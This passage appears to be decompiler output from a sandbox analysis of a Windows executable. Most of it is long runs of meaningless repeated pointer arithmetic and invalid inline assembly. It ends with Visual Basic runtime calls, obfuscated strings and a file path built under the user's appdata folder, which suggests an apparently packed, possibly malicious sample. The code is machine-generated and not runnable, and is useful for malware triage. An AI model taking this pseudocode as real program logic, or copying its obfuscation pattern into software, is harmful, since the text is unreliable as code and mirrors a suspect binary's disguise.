					 *_t260 =  *_t260 + _t260;
					 *_t260 =  *_t260 + _t260;
					 *_t260 =  *_t260 + _t260;
					 *_t260 =  *_t260 + _t260;
				}
				 *_t260 =  *_t260 + _t260;
				 *_t260 =  *_t260 + _t260;
				 *_t260 =  *_t260 + _t260;
				 *_t260 =  *_t260 + _t260;
				 *_t260 =  *_t260 + _t260;
				 *_t260 =  *_t260 + _t260;
				 *_t260 =  *_t260 + _t260;
				 *_t260 =  *_t260 + _t260;
				 *_t260 =  *_t260 + _t260;
				 *_t260 =  *_t260 + _t260;
				 *_t260 =  *_t260 + _t260;
				 *_t260 =  *_t260 + _t260;
				 *_t260 =  *_t260 + _t260;
				 *_t260 =  *_t260 + _t260;
				 *_t260 =  *_t260 + _t260;
				 *_t260 =  *_t260 + _t260;
				 *_t260 =  *_t260 + _t260;
				 *_t260 =  *_t260 + _t260;
				 *_t260 =  *_t260 + _t260;
				 *_t260 =  *_t260 + _t260;
				 *_t260 =  *_t260 + _t260;
				_t261 = _t388;
				asm("sbb eax, [eax]");
				asm("in al, dx");
				asm("sbb al, [eax]");
				if( *_t260 >= 0) {
					 *((intOrPtr*)(_t379 + 0x18)) =  *((intOrPtr*)(_t379 + 0x18)) + _t361;
					_t261 = _t261 + 2;
					 *((intOrPtr*)(_t261 + _t328 + 0x40)) =  *((intOrPtr*)(_t261 + _t328 + 0x40)) + _t328;
					 *_t261 =  *_t261 + _t261;
					 *_t261 =  *_t261 + _t261;
					 *_t261 =  *_t261 + _t261;
					 *_t261 =  *_t261 + _t261;
					 *_t261 =  *_t261 + _t261;
					 *_t261 =  *_t261 + _t261;
					 *_t261 =  *_t261 + _t261;
					 *_t261 =  *_t261 + _t261;
				}
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				 *_t261 =  *_t261 + _t261;
				asm("hlt");
				 *_t261 =  *_t261 + _t261;
				 *((intOrPtr*)(_t335 + 0x40)) =  *((intOrPtr*)(_t335 + 0x40)) + _t335;
				 *_t261 =  *_t261 + _t261;
				asm("rol bh, 1");
				_t336 = _t335 + 1;
				asm("sbb [edx], eax");
				_t263 = _t261 + _t261 & 0x00000012;
				 *_t263 =  *_t263 + _t263;
				 *_t263 =  *_t263 | _t361;
				_t362 = _t361 + 1;
				 *((intOrPtr*)(_t379 + 0x15)) =  *((intOrPtr*)(_t379 + 0x15)) + _t263;
				_t264 = _t263 + 1;
				 *_t264 =  *_t264 + _t264;
				 *_t362 =  *_t362 ^ _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				 *_t264 =  *_t264 + _t264;
				if( *_t264 >= 0) {
					_t320 = _t264 + 1;
					 *_t336 =  *_t336 + _t320;
					 *_t320 =  *_t320 + _t320;
					 *_t336 =  *_t336 + _t320;
					 *_t320 =  *_t320 + _t320;
					_t336[0x10] = _t336 + _t336[0x10];
					 *_t320 =  *_t320 + _t320;
					_t264 = _t320;
					_t336 =  &(_t336[0]);
					_t328 = _t328 + _t328;
					asm("invalid");
				}
				 *_t264 =  *_t264 + 1;
				 *_t264 =  *_t264 + _t264;
				_t265 = _t264 + _t264;
				 *_t265 =  *_t265 & _t265;
				 *_t265 =  *_t265 | _t362;
				_t363 = _t362 + 1;
				 *_t265 =  *_t265 + _t265;
				 *_t265 =  *_t265 + _t265;
				 *_t265 = _t336 +  *_t265;
				_t266 = _t265 | 0x00000098;
				 *_t266 =  *_t266 + _t266;
				 *_t266 =  *_t266 + _t266;
				 *_t266 =  *_t266 + _t266;
				 *_t266 =  *_t266 + _t266;
				 *_t266 =  *_t266 + _t266;
				ds = _t266;
				_t267 = _t266 + 1;
				 *_t336 =  *_t336 + _t267;
				 *_t267 =  *_t267 + _t267;
				 *_t267 =  *_t267 + _t267;
				_t268 = _t267 &  *_t267;
				 *_t268 =  *_t268 + _t268;
				 *_t268 =  *_t268 + _t268;
				ds = _t268;
				_t269 = _t268 + 1;
				 *_t336 =  *_t336 + _t269;
				 *_t269 =  *_t269 + _t269;
				 *((intOrPtr*)(_t269 + 0x1f)) =  *((intOrPtr*)(_t269 + 0x1f)) + _t328;
				_t270 = _t269 + 1;
				 *_t270 =  *_t270 + _t270;
				 *_t270 =  *_t270 + _t270;
				 *((intOrPtr*)(_t374 + _t328 + 0x40)) =  *((intOrPtr*)(_t374 + _t328 + 0x40)) + _t363;
				 *_t336 =  *_t336 + _t270;
				 *_t270 =  *_t270 + _t270;
				 *((intOrPtr*)(_t270 + 0x1f)) =  *((intOrPtr*)(_t270 + 0x1f)) + _t328;
				_t271 = _t270 + 1;
				 *_t379 =  *_t379 + _t363;
				 *((intOrPtr*)(_t374 + 0x6c006801)) =  *((intOrPtr*)(_t374 + 0x6c006801)) + _t363;
				 *((intOrPtr*)(_t271 - 0x2fffbfe1)) =  *((intOrPtr*)(_t271 - 0x2fffbfe1)) + _t271;
				 *_t271 =  *_t271 + _t271;
				 *_t271 =  *_t271 + _t271;
				asm("rcl byte [ecx], 1");
				asm("pushfd");
				 *_t271 =  *_t271 + _t363;
				_t272 = _t271 &  *_t271;
				 *_t328 =  *_t328 & _t272;
				_t273 = _t272 + 1;
				 *_t273 =  *_t273 + _t273;
				_pop(ds);
				 *((intOrPtr*)(_t273 + _t273)) =  *((intOrPtr*)(_t273 + _t273)) + _t363;
				 *_t273 =  *_t273 + _t273;
				 *_t328 =  *_t328 ^ _t273;
				_t274 = _t273 + 1;
				_t329 = _t328 + _t328;
				asm("invalid");
				 *_t274 =  *_t274 + 1;
				 *_t274 =  *_t274 + _t274;
				 *_t274 =  *_t274 + _t274;
				 *_t274 =  *_t274 + _t274;
				_pop(ds);
				_t276 = _t274 + _t329 + 1;
				 *((intOrPtr*)(_t276 + 0x40009c15)) =  *((intOrPtr*)(_t276 + 0x40009c15)) + _t336;
				asm("invalid");
				asm("invalid");
				_t278 = (_t276 &  *_t276) + 1;
				_v1040170976 = _v1040170976 + _t363;
				_t279 = _t278 + 1;
				 *_t279 =  *_t279 & _t279;
				asm("iretd");
				 *_t279 =  *_t279 & _t279;
				_t365 = _t279 *  *_t279 >> 0x20;
				_t281 = _t279 *  *_t279 + 1;
				 *0x2a004021 =  *0x2a004021 + _t329;
				 *_t281 =  *_t281 & _t281;
				 *_t281 =  *_t281 & _t281;
				 *_t281 =  *_t281 & _t281;
				_t380 = _t336;
				 *_t281 =  *_t281 & _t281;
				 *((intOrPtr*)(_t281 + 0x40)) =  *((intOrPtr*)(_t281 + 0x40)) + _t365;
				 *((intOrPtr*)(_t336 - 0x71ffbfe0)) =  *((intOrPtr*)(_t336 - 0x71ffbfe0)) + _t281;
				 *_t281 =  *_t281 & _t281;
				asm("wait");
				 *_t281 =  *_t281 & _t281;
				_t282 = _t281 + 1;
				_t337 = _t336 + _t336;
				 *_t282 =  *_t282 & _t282;
				_t392 =  *_t336 * 0x40 +  *_t337;
				_t283 = _t282 + 1;
				 *_t283 =  *_t283 + _t365;
				 *_t283 =  *_t283 & _t283;
				asm("aaa");
				 *_t283 =  *_t283 & _t283;
				if( *_t283 >= 0) {
					_t315 = _t283 + 1;
					_a16417 = _a16417 + _t315;
					 *_t315 =  *_t315 + _t315;
					 *((intOrPtr*)(_t315 + 0x1f)) =  *((intOrPtr*)(_t315 + 0x1f)) + _t329;
					_push(ds);
					_t318 = _t315 + 1 + _t329 + 1;
					 *((intOrPtr*)(_t318 + 0x18)) =  *((intOrPtr*)(_t318 + 0x18)) + _t365;
					 *((intOrPtr*)(_t380 + 0x18)) =  *((intOrPtr*)(_t380 + 0x18)) + _t365;
					_t283 = _t318 + 2;
					 *((intOrPtr*)(_t283 + _t329 + 0x40)) =  *((intOrPtr*)(_t283 + _t329 + 0x40)) + _t329;
					 *_t283 =  *_t283 + _t283;
					 *_t283 =  *_t283 + _t283;
				}
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *((intOrPtr*)(_t283 + 0x40)) =  *((intOrPtr*)(_t283 + 0x40)) + _t337;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *((intOrPtr*)(_t337 + 0x3304246c)) =  *((intOrPtr*)(_t337 + 0x3304246c)) + _t283;
				 *_t283 =  *_t283 + _t283;
				_t338 = _t337 + _t337;
				_pop(_t330);
				asm("cmpsd");
				 *_t283 =  *_t283 + _t283;
				_a3 = _a3 - 0xffff;
				_push(_t382);
				_push(_t338);
				_push(_t338);
				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t392;
				L00401540();
				_push(_t380);
				_push(_t374);
				_v13 = _t392;
				_v9 = 0x401270;
				_push(L"Scopiformly9");
				_push(L"baadene");
				_push( &_v65); // executed
				L00401732(); // executed
				_v105 = L"Ambulancesagen2";
				_v113 = 0x8008;
				_push( &_v65);
				_t288 =  &_v113;
				_push(_t288);
				L00401738();
				_v153 = _t288;
				L00401828();
				_t289 = _v153;
				if(_t289 != 0) {
					_push(0x1b);
					_push(L"Reklamekampagne4");
					L00401750();
					L0040183A();
					if( *0x4233c0 != 0) {
						_v172 = 0x4233c0;
					} else {
						_push(0x4233c0);
						_push(0x40257c);
						L004017CE();
						_v172 = 0x4233c0;
					}
					_v152 =  *_v172;
					_t309 =  *((intOrPtr*)( *_v152 + 0x14))(_v152,  &_v48);
					asm("fclex");
					_v156 = _t309;
					if(_v156 >= 0) {
						_v176 = _v176 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x40256c);
						_push(_v152);
						_push(_v156);
						L004017C8();
						_v176 = _t309;
					}
					_v160 = _v48;
					_t314 =  *((intOrPtr*)( *_v160 + 0x118))(_v160,  &_v148);
					asm("fclex");
					_v164 = _t314;
					if(_v164 >= 0) {
						_v180 = _v180 & 0x00000000;
					} else {
						_push(0x118);
						_push(0x40258c);
						_push(_v160);
						_push(_v164);
						L004017C8();
						_v180 = _t314;
					}
					_t289 = _v148;
					_v40 = _t289;
					L004017C2();
				}
				L004017B6();
				_push(0x44);
				_push(_v36);
				L00401750();
				L0040183A();
				_push(_t289);
				_push(L"Jordfstedes4");
				L0040172C();
				asm("sbb eax, eax");
				_v152 =  ~( ~( ~_t289));
				L00401846();
				_t293 = _v152;
				if(_t293 != 0) {
					_v104 = L"appdata";
					_v112 = 8;
					L0040184C();
					_push( &_v64);
					_push( &_v80);
					L0040171A();
					_v120 = L"\\XvFu5flZcgudIlwvVLtjOx372";
					_v128 = 8;
					_push( &_v80);
					_push( &_v128);
					_t298 =  &_v96;
					_push(_t298);
					L00401720();
					_push(_t298);
					L00401834();
					L0040183A();
					_push(_t298);
					_push(1);
					_push(0xffffffff);
					_push(0x120);
					L00401726();
					L00401846();
					_push( &_v96);
					_push( &_v80);
					_push( &_v64);
					_push(3);
					L00401840();
					_push(1);
					_push( &_v32);
					_push(0);
					L00401714();
					_push(1);
					L0040170E();
					_push(0xec);
					_push( &_v64);
					L00401708();
					_t293 =  &_v64;
					_push(_t293);
					L00401834();
					L0040183A();
					L00401828();
				}
				_push(0x41e178);
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				return _t293;
			}

0x00401888
0x0040188d
0x00401892
0x00401894
0x00401896
0x00401898
0x0040189a
0x0040189e
0x004018a0
0x004018a2
0x004018a4
0x004018a5
0x004018a6
0x004018ad
0x004018b2
0x004018b5
0x004018b7
0x004018b9
0x004018bb
0x004018bd
0x004018bf
0x004018c2
0x004018c4
0x004018c8
0x004018ca
0x004018cc
0x004018ce
0x004018d0
0x004018d2
0x004018d4
0x004018da
0x004018e1
0x00401885
0x00401885
0x004018e3
0x004018e4
0x004018e6
0x004018e7
0x004018f6
0x004018f7
0x00401900
0x00401901
0x00401904
0x00401905
0x00401907
0x00401909
0x0040190b
0x0040190d
0x0040190f
0x00401911
0x00401913
0x00401915
0x00401917
0x00401919
0x0040191b
0x0040191d
0x0040191f
0x00401921
0x00401923
0x00401925
0x00401927
0x0040192a
0x0040192c
0x0040192f
0x00401931
0x00401933
0x00401936
0x00401938
0x00401939
0x0040193a
0x0040193b
0x00401941
0x00401945
0x00401947
0x00401981
0x00401981
0x00401983
0x0040198a
0x0040198c
0x0040198e
0x00401990
0x00401992
0x00401994
0x00000000
0x0040194b
0x0040194b
0x0040194d
0x0040194f
0x00401950
0x00401953
0x00401953
0x00401956
0x00401958
0x0040195b
0x0040195f
0x00401965
0x00401968
0x0040196a
0x0040196b
0x0040196d
0x0040196f
0x00401971
0x00401972
0x00401975
0x00401978
0x00401979
0x0040197b
0x00000000
0x0040197b
0x00401995
0x00401995
0x00401997
0x0040199a
0x0040199b
0x0040199f
0x004019a1
0x004019a3
0x004019a5
0x004019ab
0x004019ad
0x004019af
0x004019b1
0x004019b3
0x004019b9
0x004019ba
0x004019bf
0x004019bf
0x00401956
0x004019c1
0x004019c3
0x004019c5
0x004019c7
0x004019c9
0x004019cb
0x004019ce
0x004019d0
0x004019d2
0x004019d4
0x004019d6
0x004019d8
0x004019dc
0x004019de
0x004019e0
0x004019e2
0x004019e4
0x004019e6
0x004019e8
0x004019e9
0x004019eb
0x004019ed
0x004019f0
0x004019f2
0x004019f4
0x004019f6
0x004019f8
0x004019fa
0x004019fc
0x004019fe
0x004019fe
0x00401a00
0x00401a00
0x00401a05
0x00401a08
0x00401a0a
0x00401a0b
0x00401a12
0x00401a16
0x00401a18
0x00401a1a
0x00401a1e
0x00401a20
0x00401a22
0x00401a22
0x00401a23
0x00401a25
0x00401a27
0x00401a29
0x00401a2b
0x00401a2d
0x00401a2f
0x00401a2f
0x00401a2f
0x00401a32
0x00401a32
0x00401aa1
0x00401aa2
0x00401aa4
0x00401aa5
0x00401aa7
0x00401aa8
0x00401aab
0x00401ab1
0x00401ab3
0x00401ab5
0x00401ab7
0x00401ab9
0x00401abb
0x00401abd
0x00401abf
0x00401ac1
0x00401ac3
0x00401ac9
0x00401acb
0x00401acd
0x00401acf
0x00401ad1
0x00401ad3
0x00401ad5
0x00401ad7
0x00401ad9
0x00401adb
0x00401ae1
0x00401ae3
0x00401ae9
0x00401aeb
0x00401aed
0x00401aef
0x00401af6
0x00401af8
0x00401af9
0x00401afc
0x00401afe
0x00401b00
0x00401b02
0x00401b04
0x00401b06
0x00401b07
0x00401b0b
0x00401b0d
0x00401b0f
0x00401b12
0x00401b13
0x00401b15
0x00401b17
0x00401b19
0x00401b1b
0x00401b1d
0x00401b1f
0x00401b23
0x00401b25
0x00401b27
0x00401b2a
0x00401b2b
0x00401b2d
0x00401b2f
0x00401b33
0x00401b35
0x00401b37
0x00401b3b
0x00401b3d
0x00401b3f
0x00401b42
0x00401b43
0x00401b45
0x00401b47
0x00401b4b
0x00401b4d
0x00401b53
0x00401b5a
0x00401b5b
0x00401b5d
0x00401b5f
0x00401b66
0x00401b67
0x00401b6a
0x00401b6b
0x00401b6e
0x00401b73
0x00401b79
0x00401b7b
0x00401b7d
0x00401b7f
0x00401b81
0x00401b83
0x00401b8a
0x00401b8b
0x00401b91
0x00401b93
0x00401b96
0x00401b97
0x00401b99
0x00401b9b
0x00401b9d
0x00401ba0
0x00401ba2
0x00401ba4
0x00401ba6
0x00401ba8
0x00401baa
0x00401bac
0x00401baf
0x00401bb5
0x00401bb8
0x00401bba
